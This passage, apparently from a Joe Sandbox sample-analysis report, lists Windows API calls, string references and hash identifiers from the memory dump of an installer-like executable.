                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                      • API String ID: 1375471231-2952887711
                                                                                                      • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                      • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                      • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                      • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                      APIs
                                                                                                      • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                      • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                      • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnumLongWindows
                                                                                                      • String ID: \AB
                                                                                                      • API String ID: 4191631535-3948367934
                                                                                                      • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                      • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                      • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                      • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                      • String ID: x|
                                                                                                      • API String ID: 730355536-1195792818
                                                                                                      • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                      • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                      • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                      • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                      APIs
                                                                                                      • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressDeleteHandleModuleProc
                                                                                                      • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                      • API String ID: 588496660-1846899949
                                                                                                      • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                      • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                      • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                      • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                      Strings
                                                                                                      • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                      • NextButtonClick, xrefs: 0046BC4C
                                                                                                      • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                      • API String ID: 0-2329492092
                                                                                                      • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                      • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                      • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                      • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                      • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveChangeNotifyWindow
                                                                                                      • String ID: $Need to restart Windows? %s
                                                                                                      • API String ID: 1160245247-4200181552
                                                                                                      • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                      • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                      • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                      • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                      • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                      • String ID: Creating directory: %s
                                                                                                      • API String ID: 2451617938-483064649
                                                                                                      • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                      • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                      • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                      • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressByteCharMultiProcWide
                                                                                                      • String ID: SfcIsFileProtected$sfc.dll
                                                                                                      • API String ID: 2508298434-591603554
                                                                                                      • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                      • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                      • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                      • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                      APIs
                                                                                                      • 75381520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                      • 75381500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                      • 75381540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: 753815007538152075381540
                                                                                                      • String ID: %E
                                                                                                      • API String ID: 3367396946-175436132
                                                                                                      • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                      • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                      • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                      • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0044B401
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectReleaseSelect
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 1831053106-1959103961
                                                                                                      • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                      • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                      • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                      • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                      • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                      • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText$ByteCharMultiWide
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 65125430-1959103961
                                                                                                      • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                      • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                      • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                      • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                      APIs
                                                                                                      • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                        • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                        • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                      • API String ID: 395431579-1506664499
                                                                                                      • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                      • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                      • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                      • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                                      Strings
                                                                                                      • PendingFileRenameOperations, xrefs: 00455A40
                                                                                                      • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                      • API String ID: 47109696-2115312317
                                                                                                      • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                      • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                                      • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                      • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                                      • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                                      • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                      • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                                      • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                      • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                      • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                      • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2066263336-0
                                                                                                      • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                      • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                                      • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                      • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                                      APIs
                                                                                                      • GetMenu.USER32(00000000), ref: 00421361
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                                      Memory Dump Source
